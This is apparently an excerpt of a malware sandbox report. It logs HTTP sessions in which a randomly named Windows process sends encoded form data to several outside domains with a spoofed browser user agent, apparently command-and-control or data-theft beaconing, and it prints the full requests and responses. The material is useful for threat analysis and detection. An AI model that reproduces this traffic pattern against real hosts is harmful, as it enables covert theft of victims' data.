                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.94999846.17.172.49806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:44.910368919 CEST1726OUTPOST /lbpf/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            Origin: http://www.galaxyslot88rtp.lat
                                                                                                            Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 46 35 31 58 2b 30 46 42 32 47 48 66 61 75 30 62 6f 37 67 36 63 6e 58 6b 44 45 68 45 75 51 75 46 76 49 73 71 73 58 72 6d 61 59 73 57 49 4f 43 38 77 32 52 49 38 6e 47 6d 4d 65 44 65 39 64 66 79 53 35 35 6c 64 54 2b 32 75 66 57 43 63 73 4c 36 5a 31 68 47 78 58 37 5a 4c 65 43 52 50 34 6e 2f 68 68 6f 43 72 57 74 38 41 7a 43 36 4c 77 4e 55 67 44 57 63 4e 68 6b 53 79 30 32 42 53 56 4a 54 46 59 31 76 47 52 4b 4c 49 53 45 49 58 43 46 78 5a 31 76 4d 2b 6b 47 6b 4d 54 49 58 68 44 71 46 77 44 58 2b 54 31 72 71 64 58 70 56 73 51 53 67 43 77 75 44 67 62 73 44 54 58 2f 38 48 6e 6b 32 53 52 72 36 54 73 4e 6b 4c 63 42 4d 6c 6e 50 61 43 2f 66 45 38 4d 6a 66 61 69 62 6a 5a 72 4f 79 49 6a 45 72 78 5a 78 71 58 74 66 6e 75 75 39 4f 75 71 44 69 35 77 4f 49 56 4d 36 35 61 75 68 36 34 68 57 49 32 30 61 6c 65 6c 37 6f 54 59 69 6a 68 77 77 32 44 54 61 45 74 5a 42 4a 4b 6c 56 68 65 4d 69 42 41 4b 32 32 6e 6c 6e 74 48 62 76 62 33 51 71 70 43 39 42 4e 49 33 65 44 34 57 [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=B8r/v0PfZmCZF51X+0FB2GHfau0bo7g6cnXkDEhEuQuFvIsqsXrmaYsWIOC8w2RI8nGmMeDe9dfyS55ldT+2ufWCcsL6Z1hGxX7ZLeCRP4n/hhoCrWt8AzC6LwNUgDWcNhkSy02BSVJTFY1vGRKLISEIXCFxZ1vM+kGkMTIXhDqFwDX+T1rqdXpVsQSgCwuDgbsDTX/8Hnk2SRr6TsNkLcBMlnPaC/fE8MjfaibjZrOyIjErxZxqXtfnuu9OuqDi5wOIVM65auh64hWI20alel7oTYijhww2DTaEtZBJKlVheMiBAK22nlntHbvb3QqpC9BNI3eD4WUsWu/EurtlN6vZJYj18ukfqGf888zaWMsU8sC6f5ZGqlpqweq3lSdXroo2SUuT2uy8+bXJ/vIj4u7ADgcj9weG6ARHYuceDH3545BYRtepxyYK5/KxMaa9IYTNEDv1D8t7AJu/avWALu6DuHe46KcAuyjNMIiYue6MItRujLtkfEnoBDKg6y7Np2142AvXmOwvrEaRgKRlS9sezqVrS+f7JyjGHYI3LH+r4hmWnj6m2Pg2TxihTs4bu+louDWpB+d5121VzLWnO0vM283vyIn8IrFXUtmg1RVxOVRyvmKjF2e8dH3X7AHcWQSAUGve1kq4qWDu4JFXw8TZ2eOSDTrhb20rp3MBjMQUfE7XPW65I3EQI2nP3KCsjOGUIyffH6SD9tVikuECMYQ5cTBnWwnNRQ76OlbSHaLEn3KZpWj7yU2j6IZ309yK5YRtWOnc48PuKcGmqDlY8CyVsO5nZXpuENWm0g94S4a/7Rj14/HV4HZMdGVb6t33vf2wlCw07Gr4x/tULEryP6cqkxvPnHQSLr3s/lPvsli1dHTGSvyTyVlmy5t1sHLvP+IApKOSqOuVB4k5fadzLI6RWF4DDXezKxffrXKK9W0aLMu1hVuWLJujWSZ/Dp5nedWmTVJ5G7A457RmkwO7IYZGP8VdU8zMpRzj9EXA/7Fp [TRUNCATED]
                                                                                                            Oct 7, 2024 15:56:45.770462036 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:45 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:45.771207094 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.94999946.17.172.49806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:47.468005896 CEST419OUTGET /lbpf/?EjLdUJJ=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK9wtqtHM6pRVxdkXmhbbPLR4PLxBAP1w==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:56:48.385234118 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:48 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:48.385255098 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.9500003.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:53.463088989 CEST689OUTPOST /kzas/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            Origin: http://www.warriorsyndrome.net
                                                                                                            Referer: http://www.warriorsyndrome.net/kzas/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 6d 61 76 51 30 4f 34 37 4a 32 68 48 2f 54 35 6c 6f 42 57 61 59 6b 6f 49 57 55 50 53 74 31 6a 65 6a 44 7a 76 31 49 62 6c 33 4c 4f 2f 4f 50 68 2f 76 4c 57 55 79 46 32 46 4a 74 54 4a 2b 5a 36 4a 75 44 57 49 6b 48 4e 61 54 69 69 2b 6a 4f 61 78 58 52 73 77 48 56 30 56 32 4a 69 46 75 39 49 5a 4c 57 45 72 61 49 65 78 2b 59 58 49 71 67 55 38 33 54 66 32 36 4d 6b 58 46 74 72 66 50 5a 34 73 30 6c 35 43 2b 4c 30 4a 78 63 51 69 4b 78 38 76 47 76 67 52 47 32 47 75 61 4b 4b 4d 56 2f 46 7a 6c 30 41 62 30 76 74 36 7a 4c 71 75 63 38 72 70 59 77 62 6f 38 63 69 42 76 30 48 4c
                                                                                                            Data Ascii: EjLdUJJ=mavQ0O47J2hH/T5loBWaYkoIWUPSt1jejDzv1Ibl3LO/OPh/vLWUyF2FJtTJ+Z6JuDWIkHNaTii+jOaxXRswHV0V2JiFu9IZLWEraIex+YXIqgU83Tf26MkXFtrfPZ4s0l5C+L0JxcQiKx8vGvgRG2GuaKKMV/Fzl0Ab0vt6zLquc8rpYwbo8ciBv0HL


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.9500013.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:56.583277941 CEST713OUTPOST /kzas/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            Origin: http://www.warriorsyndrome.net
                                                                                                            Referer: http://www.warriorsyndrome.net/kzas/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 6d 61 76 51 30 4f 34 37 4a 32 68 48 77 54 4a 6c 74 69 2b 61 65 45 6f 48 54 55 50 53 33 46 6a 53 6a 44 2f 76 31 4a 76 31 33 2b 6d 2f 4f 71 4e 2f 6f 4b 57 55 7a 46 32 46 43 4e 53 4e 6a 70 36 57 75 44 61 41 6b 44 46 61 54 6d 4b 2b 6a 4c 32 78 58 67 73 7a 57 56 30 54 35 70 69 4c 68 64 49 5a 4c 57 45 72 61 49 61 62 2b 59 50 49 72 54 38 38 34 53 66 78 35 4d 6b 55 52 39 72 66 65 70 34 6f 30 6c 34 6c 2b 4b 6f 6e 78 59 67 69 4b 7a 30 76 47 63 34 65 66 6d 47 73 65 4b 4b 64 54 39 74 38 70 6d 59 6c 71 4d 6b 65 68 34 65 38 66 64 4c 33 4a 43 53 7a 70 4c 69 6d 6f 54 4f 6a 52 73 50 41 78 4b 44 6e 6f 33 2b 43 74 57 6b 71 42 63 34 33 42 67 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=mavQ0O47J2hHwTJlti+aeEoHTUPS3FjSjD/v1Jv13+m/OqN/oKWUzF2FCNSNjp6WuDaAkDFaTmK+jL2xXgszWV0T5piLhdIZLWEraIab+YPIrT884Sfx5MkUR9rfep4o0l4l+KonxYgiKz0vGc4efmGseKKdT9t8pmYlqMkeh4e8fdL3JCSzpLimoTOjRsPAxKDno3+CtWkqBc43Bg==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.9500023.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:59.156229019 CEST1726OUTPOST /kzas/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            Origin: http://www.warriorsyndrome.net
                                                                                                            Referer: http://www.warriorsyndrome.net/kzas/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 6d 61 76 51 30 4f 34 37 4a 32 68 48 77 54 4a 6c 74 69 2b 61 65 45 6f 48 54 55 50 53 33 46 6a 53 6a 44 2f 76 31 4a 76 31 33 34 2b 2f 4e 63 5a 2f 6f 70 2b 55 77 46 32 46 4c 74 53 41 6a 70 37 4b 75 44 43 4d 6b 44 42 4b 54 6b 43 2b 6a 70 2b 78 52 53 55 7a 50 46 30 54 68 5a 69 4b 75 39 49 4d 4c 57 56 73 61 4c 79 62 2b 59 50 49 72 57 34 38 78 6a 66 78 31 73 6b 58 46 74 72 62 50 5a 34 41 30 6c 67 66 2b 4b 73 5a 78 72 6f 69 4b 54 45 76 57 2b 67 65 58 6d 47 71 5a 4b 4c 41 54 39 77 38 70 6c 38 44 71 50 35 4c 68 34 6d 38 4a 34 75 73 4d 68 4b 31 32 35 69 74 6c 78 61 41 59 4a 37 48 33 62 4b 36 2f 31 6e 67 74 54 56 48 49 50 41 2b 63 48 33 47 59 62 51 4a 67 2f 2b 4d 6d 41 4c 33 6f 6d 49 36 71 30 4a 74 4a 49 78 54 62 7a 38 7a 61 61 6c 75 57 54 51 54 42 79 7a 6e 6c 38 45 47 39 41 4c 33 48 67 72 54 7a 6c 59 5a 59 33 56 42 48 73 32 75 75 75 5a 63 74 41 59 41 72 43 38 41 41 6c 66 53 31 35 37 4c 37 43 39 38 50 5a 61 46 63 4a 50 71 52 67 69 75 78 53 71 2f 77 45 78 2f 2b 42 49 45 34 48 31 46 4b 6d [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=mavQ0O47J2hHwTJlti+aeEoHTUPS3FjSjD/v1Jv134+/NcZ/op+UwF2FLtSAjp7KuDCMkDBKTkC+jp+xRSUzPF0ThZiKu9IMLWVsaLyb+YPIrW48xjfx1skXFtrbPZ4A0lgf+KsZxroiKTEvW+geXmGqZKLAT9w8pl8DqP5Lh4m8J4usMhK125itlxaAYJ7H3bK6/1ngtTVHIPA+cH3GYbQJg/+MmAL3omI6q0JtJIxTbz8zaaluWTQTByznl8EG9AL3HgrTzlYZY3VBHs2uuuZctAYArC8AAlfS157L7C98PZaFcJPqRgiuxSq/wEx/+BIE4H1FKmew/bv19UC4clwc4zIHhIMKYe5B1D/13JGy5MdTUSWyid13utYT/jhKtHIXcsWXTXbdDb6WdFaShV37UlHBSE7hyNMsvGH3cMoBa4w6+p+VI6oi5SYRP9OWdVfDP5Lx8TVRxbMcEQfyeSlfLVMvRGiTXfBCpBAi3SPtp40V/dnFClSodW4/J9AxjtKZh3C6jN7NxMkQinuTH2h0Rlc115qDi3gxgzQpuwufUehipQ1C5CoP/wOrG2u0mNCovDHklzv37R0cXRmhXsJnBdvBCx0Qv8uWDPSHtxSxcaJLI/NqcuHtCb/HCYKdiOx2f1LDZ1jTAu+Np8LUjiBFUwTF6od0Ar+sOuO+k1yJkbO1kWUf0MSaNbP0v4jJp97xipQo9D2ZG/Hgewc25KOPmglfmCaUdvi3DjA5olmAEa7eJHP8q1kYZHDjT25Yxz+MUjsumdnsD8IgBXYFlnUwThhWdIWGiis3xDy7vK3l5zizWTZ1B10F2fuwfepZBlt8F0qa2i5M/7Z2PB/DZhC6s2NIL4C0br6n1Xo7zVZws+y2H01q6dFFyFl1+c9RF/M1YBmnOzwhoJRNDt39+r0wX4o5ytJzDlFm0HkicnlDYKyauYG0u1NkOdL1JEKYr8Jcr1gEnEe5TDntPpjWlHraOKAKrlLGOdsU+QyGoxtK [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.9500033.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:01.698904037 CEST419OUTGET /kzas/?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:57:02.142079115 CEST399INHTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:57:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 6a 4c 64 55 4a 4a 3d 72 59 48 77 33 2b 77 63 5a 33 4d 41 31 67 38 42 6c 54 6a 67 56 33 67 49 55 53 72 39 74 79 58 4b 39 53 36 46 6f 4c 44 4a 6d 4f 50 53 49 64 6c 76 74 72 71 77 72 6b 62 35 42 38 69 71 75 4c 57 4e 76 58 43 66 68 44 74 56 4b 58 57 68 6c 62 79 34 4d 56 41 61 4a 47 67 4b 6d 65 57 45 69 4b 63 32 49 6b 64 51 4c 6f 4f 6c 70 4a 36 4d 6c 7a 51 57 75 67 3d 3d 26 57 4c 55 44 75 3d 53 58 71 38 79 72 76 50 56 64 33 74 66 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tf"}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.9500043.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:07.241625071 CEST662OUTPOST /uxh9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            Origin: http://www.ks1x7i.vip
                                                                                                            Referer: http://www.ks1x7i.vip/uxh9/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 39 75 58 6f 5a 46 4d 61 66 35 4d 78 48 31 7a 41 79 4c 70 36 7a 66 64 47 68 37 53 47 36 37 6c 4e 76 71 48 63 48 41 67 62 75 63 2b 63 36 33 39 62 6f 78 44 45 66 43 7a 64 32 6b 78 33 35 68 37 54 50 75 51 64 75 58 52 71 72 44 48 44 69 61 46 74 46 38 6c 68 79 42 51 79 32 6e 46 2f 6c 62 54 51 48 30 65 6f 4d 57 69 7a 65 77 6f 4d 38 43 6b 30 7a 77 68 56 36 75 55 42 4f 6a 6f 36 68 6d 4c 49 65 42 33 37 31 64 64 2b 52 56 6c 4e 48 7a 79 35 67 76 65 4d 71 46 4e 61 73 43 34 56 6b 63 7a 68 38 6b 78 6b 68 69 66 51 76 52 33 4c 70 34 32 49 48 31 65 35 39 6b 73 6d 44 2f 35 47
